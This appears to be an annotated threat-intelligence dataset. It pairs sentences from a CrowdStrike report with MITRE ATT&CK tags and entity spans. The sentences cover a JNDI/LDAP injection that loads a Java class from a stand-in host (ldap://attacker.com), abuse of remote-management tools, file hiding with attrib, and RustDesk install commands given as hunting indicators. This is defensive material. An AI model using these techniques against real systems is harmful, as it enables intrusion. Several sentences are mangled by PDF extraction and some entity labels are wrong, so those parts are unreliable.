"49_crowdstrike_report", "page_number": 24, "sentence_id": 287, "context_before": "For more information, see https://www.crowdstrike.com/products/security-and-it-operations/falcon-surface/.", "sentence_text": "NOWHERE TO HIDE 24 3 VictimattackerredirectedHTTP serverto ldap://attacker.com 1 JNDIldap://attacker.cominjection request WEBLOGIC SERVER 2 Queries LDAP server (attacker LDAP server)", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Sends a JNDI LDAP injection request that causes the WebLogic server to query an attacker-controlled LDAP server", "entities": [ { "text": " ldap://attacker.com ", "start": 58, "end": 79, "label": "Infrastructure_Indicator" }, { "text": "JNDIldap://attacker.cominjection request WEBLOGIC SERVER 2 Queries LDAP server (attacker LDAP server)", "start": 81, "end": 182, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p24-s288-b34349", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 24, "sentence_id": 288, "context_before": "NOWHERE TO HIDE 24 3 VictimattackerredirectedHTTP serverto ldap://attacker.com 1 JNDIldap://attacker.cominjection request WEBLOGIC SERVER 2 Queries LDAP server (attacker LDAP server)", "sentence_text": "Load malicious Java class ldap://attacker.com (attacker HTTP server)\nAnother Oracle exploit — abusing an arbitrary file overwrite vulnerability impacting E-Business Suite (CVE-2022- 21587) — was also repeatedly observed during early 2023.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1203", "name": "Exploitation for Client Execution" } ], "procedure": "Load a malicious Java class from attacker infrastructure and abuse an Oracle arbitrary file overwrite vulnerability affecting E-Business Suite.", "entities": [ { "text": "Load malicious Java class", "start": 0, "end": 25, "label": "Action" }, { "text": "ldap://attacker.com", "start": 26, "end": 45, "label": "Infrastructure_Indicator" }, { "text": "attacker HTTP server", "start": 47, "end": 67, "label": "Infrastructure_Indicator" }, { "text": "Oracle exploit", "start": 77, "end": 91, "label": "MalwareTool" }, { "text": "abusing an arbitrary file overwrite vulnerability", "start": 94, "end": 143, "label": "Action" }, { "text": "E-Business Suite", "start": 154, "end": 170, "label": "Infrastructure_Indicator" }, { "text": "CVE-2022- 21587", "start": 172, "end": 187, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p24-s289-fb0916", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 24, "sentence_id": 289, "context_before": "Load malicious Java class ldap://attacker.com (attacker HTTP server)\nAnother Oracle exploit — abusing an arbitrary file overwrite vulnerability impacting E-Business Suite (CVE-2022- 21587) — was also repeatedly observed during early 2023.", "sentence_text": "This included suspected CVE-2023-21839 exploitation by the notorious access broker PROPHET SPIDER, the most prolific eCrime adversary exploiting public-facing web applications this past year.27", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "exploitation by PROPHET SPIDER", "entities": [ { "text": "exploitation ", "start": 39, "end": 52, "label": "Action" }, { "text": "PROPHET SPIDER", "start": 83, "end": 97, "label": "ThreatActor" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p24-s290-96b546", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 24, "sentence_id": 290, "context_before": "This included suspected CVE-2023-21839 exploitation by the notorious access broker PROPHET SPIDER, the most prolific eCrime adversary exploiting public-facing web applications this past year.27", "sentence_text": "Access brokers share some operational commonalities with state-nexus threat actors: gaining initial access to an organization through exploitation, attempting to remain hidden from traditional detection systems and establishing persistent access to an organization until follow-on activity occurs.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "threat actors exploit organisations and attempt to avoid detection and establish persistent access", "entities": [ { "text": "Access broker", "start": 0, "end": 13, "label": "ThreatActor" }, { "text": "state-nexus threat actors", "start": 57, "end": 82, "label": "ThreatActor" }, { "text": " gaining initial access", "start": 83, "end": 106, "label": "Action" }, { "text": "exploitation", "start": 134, "end": 146, "label": "Action" }, { "text": "remain hidden", "start": 162, "end": 175, "label": "Action" }, { "text": " establishing persistent access", "start": 214, "end": 245, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p24-s291-af9e1d", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 24, "sentence_id": 291, "context_before": "Access brokers share some operational commonalities with state-nexus threat actors: gaining initial access to an organization through exploitation, attempting to remain hidden from traditional detection systems and establishing persistent access to an organization until follow-on activity occurs.", "sentence_text": "Access brokers sell their established access to a variety of clientele.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p24-s292-64b4e5", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 24, "sentence_id": 292, "context_before": "Access brokers sell their established access to a variety of clientele.", "sentence_text": "This has a dual impact on the eCrime ecosystem.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p24-s293-18c2a3", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 24, "sentence_id": 293, "context_before": "This has a dual impact on the eCrime ecosystem.", "sentence_text": "First, it lowers the barrier to entry for individuals looking to conduct criminal operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p24-s294-a4a6cd", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 24, "sentence_id": 294, "context_before": "First, it lowers the barrier to entry for individuals looking to conduct criminal operations.", "sentence_text": "Second, it allows for established adversaries to focus their efforts on honing their post-exploitation tradecraft to achieve their malicious objectives more efficiently.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p24-s295-184af6", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 24, "sentence_id": 295, "context_before": "Second, it allows for established adversaries to focus their efforts on honing their post-exploitation tradecraft to achieve their malicious objectives more efficiently.", "sentence_text": "In the past year, there has been a 147% increase in access broker advertisements in criminal or underground communities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p24-s296-5b0ce9", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 24, "sentence_id": 296, "context_before": "In the past year, there has been a 147% increase in access broker advertisements in criminal or underground communities.", "sentence_text": "This stark increase in supply of compromised credentials is likely indicative of growing demand from adversaries looking to buy these credentials for follow-on activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p24-s297-cc7c05", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 24, "sentence_id": 297, "context_before": "This stark increase in supply of compromised credentials is likely indicative of growing demand from adversaries looking to buy these credentials for follow-on activity.", "sentence_text": "For more information on access broker activity, see https://www.crowdstrike.com/blog/access-brokers-targets-and-worth/.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p25-s298-b09c75", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 25, "sentence_id": 298, "context_before": "For more information on access broker activity, see https://www.crowdstrike.com/blog/access-brokers-targets-and-worth/.", "sentence_text": "NOWHERE TO HIDE 25 Defensive Countermeasures Prioritize identity protection.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p25-s299-51e9d4", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 25, "sentence_id": 299, "context_before": "NOWHERE TO HIDE 25 Defensive Countermeasures Prioritize identity protection.", "sentence_text": "With identity becoming the new perimeter that adversaries exploit, defenders must adapt their security measures accordingly to stay ahead of threats and counteract tactics for gaining initial access.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p25-s300-bf882e", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 25, "sentence_id": 300, "context_before": "With identity becoming the new perimeter that adversaries exploit, defenders must adapt their security measures accordingly to stay ahead of threats and counteract tactics for gaining initial access.", "sentence_text": "Stay on top of patching and updates.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p25-s301-4e13e7", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 25, "sentence_id": 301, "context_before": "Stay on top of patching and updates.", "sentence_text": "Ensure that all systems, software and applications are up-to-date with the latest patches.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p25-s302-156910", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 25, "sentence_id": 302, "context_before": "Ensure that all systems, software and applications are up-to-date with the latest patches.", "sentence_text": "“Low-hanging fruit” vulnerabilities are a common entry point for initial access brokers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p25-s303-d83604", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 25, "sentence_id": 303, "context_before": "“Low-hanging fruit” vulnerabilities are a common entry point for initial access brokers.", "sentence_text": "Hunt for follow-on behaviors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p25-s304-3f7732", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 25, "sentence_id": 304, "context_before": "Hunt for follow-on behaviors.", "sentence_text": "While the vulnerability landscape changes daily, the post-exploitation actions an adversary takes in achieving their objectives are much less dynamic.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p25-s305-60335f", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 25, "sentence_id": 305, "context_before": "While the vulnerability landscape changes daily, the post-exploitation actions an adversary takes in achieving their objectives are much less dynamic.", "sentence_text": "Continuous hunting for known patterns of adversary behavior — such as logging in from new locations, accessing resources outside of normal operating hours and access-denied events — is an effective way to identify the abuse of both known and unknown vulnerabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p25-s306-7ed34a", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 25, "sentence_id": 306, "context_before": "Continuous hunting for known patterns of adversary behavior — such as logging in from new locations, accessing resources outside of normal operating hours and access-denied events — is an effective way to identify the abuse of both known and unknown vulnerabilities.", "sentence_text": "Implement multifactor authentication (MFA) wherever possible.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p25-s307-4a8d5e", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 25, "sentence_id": 307, "context_before": "Implement multifactor authentication (MFA) wherever possible.", "sentence_text": "MFA provides an added layer of security that can prevent account compromise, even in the event of credential compromise.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p25-s308-78cdd6", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 25, "sentence_id": 308, "context_before": "MFA provides an added layer of security that can prevent account compromise, even in the event of credential compromise.", "sentence_text": "Leverage up-to-date threat intelligence.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p25-s309-419239", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 25, "sentence_id": 309, "context_before": "Leverage up-to-date threat intelligence.", "sentence_text": "Stay informed about the latest adversarial tradecraft as it relates to initial access brokers to better understand their TTPs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p26-s310-df70f9", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 26, "sentence_id": 310, "context_before": "Stay informed about the latest adversarial tradecraft as it relates to initial access brokers to better understand their TTPs.", "sentence_text": "NOWHERE TO HIDE 26 REMOTE MONITORING AND MANAGEMENT TOOLS RMM tools allow information technology (IT) administrators TOP 10 RMM TOOLS to remotely support workstation and server endpoints.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p26-s311-be76b5", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 26, "sentence_id": 311, "context_before": "NOWHERE TO HIDE 26 REMOTE MONITORING AND MANAGEMENT TOOLS RMM tools allow information technology (IT) administrators TOP 10 RMM TOOLS to remotely support workstation and server endpoints.", "sentence_text": "July 2022 to June 2023 vs. July 2021 to June 2022 However, these packages are commonly abused by adversaries seeking to gain and maintain a C2 channel into ANYDESK a victim’s environment.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "adversaries abuse packages to gain and maintain a C2 channel", "entities": [ { "text": "gain and maintain a C2 channel", "start": 120, "end": 150, "label": "Action" }, { "text": "adversaries ", "start": 97, "end": 109, "label": "MalwareTool" }, { "text": "abused ", "start": 87, "end": 94, "label": "Action" }, { "text": "packages ", "start": 65, "end": 74, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p26-s312-2980d5", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 26, "sentence_id": 312, "context_before": "July 2022 to June 2023 vs. July 2021 to June 2022 However, these packages are commonly abused by adversaries seeking to gain and maintain a C2 channel into ANYDESK a victim’s environment.", "sentence_text": "CONNECTWISE SCREENCONNECT CONTROL", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p26-s314-f15109", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 26, "sentence_id": 314, "context_before": "SPLASHTOP", "sentence_text": "The top tool used this past year by a large margin was FLEETDECK AnyDesk.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p26-s315-79f3c6", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 26, "sentence_id": 315, "context_before": "The top tool used this past year by a large margin was FLEETDECK AnyDesk.", "sentence_text": "In intrusions where AnyDesk was observed, TIGHTVNC 2023", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p26-s316-6f648f", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 26, "sentence_id": 316, "context_before": "In intrusions where AnyDesk was observed, TIGHTVNC 2023", "sentence_text": "eCrime activity comprised 73% of the intrusions, targeted 2022 N-ABLE REMOTE activity comprised 4% of intrusions and unattributed activity ACCESS SOFTWARE made up the remaining 23%.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p26-s317-d10808", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 26, "sentence_id": 317, "context_before": "eCrime activity comprised 73% of the intrusions, targeted 2022 N-ABLE REMOTE activity comprised 4% of intrusions and unattributed activity ACCESS SOFTWARE made up the remaining 23%.", "sentence_text": "ScreenConnect and Atera Agent were also routinely used by eCrime threat actors.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.002", "name": "Tool" } ], "procedure": "ScreenConnect and Ater agent were used by actors", "entities": [ { "text": "ScreenConnect ", "start": 0, "end": 14, "label": "MalwareTool" }, { "text": "Atera Agent", "start": 18, "end": 29, "label": "MalwareTool" }, { "text": "used ", "start": 50, "end": 55, "label": "Action" }, { "text": "threat actors.", "start": 65, "end": 79, "label": "ThreatActor" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p26-s318-d2473f", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 26, "sentence_id": 318, "context_before": "ScreenConnect and Atera Agent were also routinely used by eCrime threat actors.", "sentence_text": "Comparison of the incidence of RMM tools indicating eCrime actors are inclined to quickly swap tools most frequently observed by Falcon OverWatch in to achieve their desired outcomes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p26-s319-a2a22c", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 26, "sentence_id": 319, "context_before": "Comparison of the incidence of RMM tools indicating eCrime actors are inclined to quickly swap tools most frequently observed by Falcon OverWatch in to achieve their desired outcomes.", "sentence_text": "The threat actors benefit interactive intrusions, July 2022-June 2023 vs. July from ease of use and lack of required effort compared to 2021-June 2022 developing their own custom tools.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p27-s320-62dff9", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 27, "sentence_id": 320, "context_before": "The threat actors benefit interactive intrusions, July 2022-June 2023 vs. July from ease of use and lack of required effort compared to 2021-June 2022 developing their own custom tools.", "sentence_text": "Once in the environment, threat actors often attempt to conceal the presence of their tool.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "Attempt to conceal the presence of tools within the compromised environment to evade detection.", "entities": [ { "text": "threat actors", "start": 25, "end": 38, "label": "ThreatActor" }, { "text": "attempt to conceal the presence of their tool", "start": 45, "end": 90, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p27-s321-babe65", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 27, "sentence_id": 321, "context_before": "Once in the environment, threat actors often attempt to conceal the presence of their tool.", "sentence_text": "In one example, DISTANT SPIDER was observed installing ScreenConnect as a service on a Windows endpoint and masquerading the service name to appear as a Microsoft service.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.004", "name": "Masquerade Task or Service" }, { "id": "T1543.003", "name": "Windows Service" } ], "procedure": "DISTANT SPIDER installed ScreenConnect masqueraded as a Microsoft service", "entities": [ { "text": "installing ScreenConnect", "start": 44, "end": 68, "label": "Action" }, { "text": "DISTANT SPIDER", "start": 16, "end": 30, "label": "MalwareTool" }, { "text": "masquerading the service", "start": 108, "end": 132, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p27-s322-fbca8c", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 27, "sentence_id": 322, "context_before": "In one example, DISTANT SPIDER was observed installing ScreenConnect as a service on a Windows endpoint and masquerading the service name to appear as a Microsoft service.", "sentence_text": "Falcon OverWatch also observed threat actors designating RMM tools and other client binaries as hidden system files using the attrib +s +h command to change the file attributes and ultimately attempt to conceal the file from view.\nNotable Tool: RustDesk RustDesk is an RMM tool written in the Rust programming language with typical RMM functionality.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1222.001", "name": "Windows File and Directory Permissions Modification" } ], "procedure": "actors use RMM tools to conceal files", "entities": [ { "text": "actors ", "start": 38, "end": 45, "label": "ThreatActor" }, { "text": "RMM tools and other client binaries", "start": 57, "end": 92, "label": "MalwareTool" }, { "text": "hidden system files", "start": 96, "end": 115, "label": "Action" }, { "text": "command to change the file", "start": 139, "end": 165, "label": "Action" }, { "text": "conceal ", "start": 203, "end": 211, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p27-s323-48c8a5", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 27, "sentence_id": 323, "context_before": "Falcon OverWatch also observed threat actors designating RMM tools and other client binaries as hidden system files using the attrib +s +h command to change the file attributes and ultimately attempt to conceal the file from view.\nNotable Tool: RustDesk RustDesk is an RMM tool written in the Rust programming language with typical RMM functionality.", "sentence_text": "Adversaries have likely adopted RustDesk to avoid detections in place for myriad other well-known RMM alternatives.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.002", "name": "Tool" } ], "procedure": "adversaries use RustDesk to avoid detection", "entities": [ { "text": "adopted", "start": 24, "end": 31, "label": "Action" }, { "text": "RustDesk ", "start": 32, "end": 41, "label": "MalwareTool" }, { "text": "Adversaries ", "start": 0, "end": 12, "label": "MalwareTool" }, { "text": "avoid detections", "start": 44, "end": 60, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p27-s324-9ee61b", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 27, "sentence_id": 324, "context_before": "Adversaries have likely adopted RustDesk to avoid detections in place for myriad other well-known RMM alternatives.", "sentence_text": "Notes for Defenders The RustDesk domain rustdesk[.]com and GitHub repository github[.]com/rustdesk host binaries and source code for RustDesk.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p27-s325-7d90f6", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 27, "sentence_id": 325, "context_before": "Notes for Defenders The RustDesk domain rustdesk[.]com and GitHub repository github[.]com/rustdesk host binaries and source code for RustDesk.", "sentence_text": "Unauthorized use of this tool is the first indicator of potentially malicious activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p27-s326-a6091b", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 27, "sentence_id": 326, "context_before": "Unauthorized use of this tool is the first indicator of potentially malicious activity.", "sentence_text": "RustDesk can be configured to use any internal or external IP or domain for its server components.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p27-s327-67f1f7", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 27, "sentence_id": 327, "context_before": "RustDesk can be configured to use any internal or external IP or domain for its server components.", "sentence_text": "Therefore, defenders must look for other indicators of attack (IOAs).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p27-s328-5e89af", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 27, "sentence_id": 328, "context_before": "Therefore, defenders must look for other indicators of attack (IOAs).", "sentence_text": "The client install tends to be artifact-heavy, based on Falcon OverWatch observations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p27-s329-ba048f", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 27, "sentence_id": 329, "context_before": "The client install tends to be artifact-heavy, based on Falcon OverWatch observations.", "sentence_text": "The following are example command lines from Falcon OverWatch-observed intrusions that can be used when looking for evidence of malicious activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p27-s330-4cbbb5", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 27, "sentence_id": 330, "context_before": "The following are example command lines from Falcon OverWatch-observed intrusions that can be used when looking for evidence of malicious activity.", "sentence_text": "The RustDesk installer may configure a Windows host firewall rule for client communication:\nnetsh advfirewall firewall add rule name=\"RustDesk Service\" dir=in action=allow program=\"C:\\Program Files\\RustDesk\\RustDesk.exe\" enable=yes 28 More information can be found at https://github.com/rustdesk.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p28-s331-19557b", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 28, "sentence_id": 331, "context_before": "The RustDesk installer may configure a Windows host firewall rule for client communication:\nnetsh advfirewall firewall add rule name=\"RustDesk Service\" dir=in action=allow program=\"C:\\Program Files\\RustDesk\\RustDesk.exe\" enable=yes 28 More information can be found at https://github.com/rustdesk.", "sentence_text": "NOWHERE TO HIDE 28", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p28-s332-b396da", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 28, "sentence_id": 332, "context_before": "NOWHERE TO HIDE 28", "sentence_text": "The RustDesk installer may add registry keys for the installed client:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p28-s333-a875a2", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 28, "sentence_id": 333, "context_before": "The RustDesk installer may add registry keys for the installed client:", "sentence_text": "reg add\nHKEY_CLASSES_ROOT\\.rustdesk\\shell\\open\\command /f", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p28-s336-7c41a5", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 28, "sentence_id": 336, "context_before": "REG_SZ /d", "sentence_text": "\"\\\"C:\\Program Files\\RustDesk\\RustDesk exe\\\" --play \\\"%1\\\"\" reg add HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\ CurrentVersion\\Uninstall\\RustDesk /f /v", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p28-s337-877540", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 28, "sentence_id": 337, "context_before": "\"\\\"C:\\Program Files\\RustDesk\\RustDesk exe\\\" --play \\\"%1\\\"\" reg add HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\ CurrentVersion\\Uninstall\\RustDesk /f /v", "sentence_text": "UninstallString /t", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p28-s339-f33852", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 28, "sentence_id": 339, "context_before": "REG_SZ /d", "sentence_text": "\"\\\"C:\\Program Files\\ RustDesk\\RustDesk.exe\\\" --uninstall\" The RustDesk installer may create a service, with or without an imported configuration option, for the installed client:\nsc create RustDesk binpath= \"\\\"C:\\Program Files\\RustDesk\\RustDesk.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p28-s340-5a2ce9", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 28, "sentence_id": 340, "context_before": "\"\\\"C:\\Program Files\\ RustDesk\\RustDesk.exe\\\" --uninstall\" The RustDesk installer may create a service, with or without an imported configuration option, for the installed client:\nsc create RustDesk binpath= \"\\\"C:\\Program Files\\RustDesk\\RustDesk.", "sentence_text": "exe\\\" --import-config \\\"C:\\Users\\[REDACTED Path]\\AppData\\Roaming\\ RustDesk\\config\\RustDesk.toml\\\"\" start= auto DisplayName= \"RustDesk Service\" sc create RustDesk binpath= \"\\\"C:\\Program Files\\RustDesk\\RustDesk.\nexe\\\" --service\" start= auto DisplayName= \"RustDesk Service\" Notable Tool: FleetDeck Falcon OverWatch observed FleetDeck abuse exclusively by SCATTERED SPIDER.29", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p28-s341-91a64a", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 28, "sentence_id": 341, "context_before": "exe\\\" --import-config \\\"C:\\Users\\[REDACTED Path]\\AppData\\Roaming\\ RustDesk\\config\\RustDesk.toml\\\"\" start= auto DisplayName= \"RustDesk Service\" sc create RustDesk binpath= \"\\\"C:\\Program Files\\RustDesk\\RustDesk.\nexe\\\" --service\" start= auto DisplayName= \"RustDesk Service\" Notable Tool: FleetDeck Falcon OverWatch observed FleetDeck abuse exclusively by SCATTERED SPIDER.29", "sentence_text": "If FleetDeck is not a legitimate tool in the IT environment, the unexpected presence of the tool should be taken as an IOA.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p28-s342-52d110", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 28, "sentence_id": 342, "context_before": "If FleetDeck is not a legitimate tool in the IT environment, the unexpected presence of the tool should be taken as an IOA.", "sentence_text": "FleetDeck currently supports agents for the Windows operating system, with agents for macOS and Linux in development.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p28-s343-8fb9e2", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 28, "sentence_id": 343, "context_before": "FleetDeck currently supports agents for the Windows operating system, with agents for macOS and Linux in development.", "sentence_text": "Like RustDesk, the tool is new and less likely to be detected than more prevalent RMM tool choices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p28-s344-d03774", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 28, "sentence_id": 344, "context_before": "Like RustDesk, the tool is new and less likely to be detected than more prevalent RMM tool choices.", "sentence_text": "For more details of SCATTERED SPIDER’s use of RMM tools, see this related blog:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": 